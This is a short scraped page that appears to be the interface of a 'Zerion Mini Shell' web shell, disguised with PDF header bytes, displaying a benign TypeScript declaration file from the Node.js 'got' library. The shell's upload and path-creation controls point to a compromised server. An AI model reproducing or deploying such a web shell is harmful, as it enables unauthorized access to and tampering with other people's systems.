%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/share/nodejs/got/dist/core/utils/
Upload File :
Create Path :
Current File : //usr/share/nodejs/got/dist/core/utils/weakable-map.d.ts

export default class WeakableMap<K, V> {
    weakMap: WeakMap<Record<string, unknown>, V>;
    map: Map<K, V>;
    constructor();
    set(key: K, value: V): void;
    get(key: K): V | undefined;
    has(key: K): boolean;
}

Zerion Mini Shell 1.0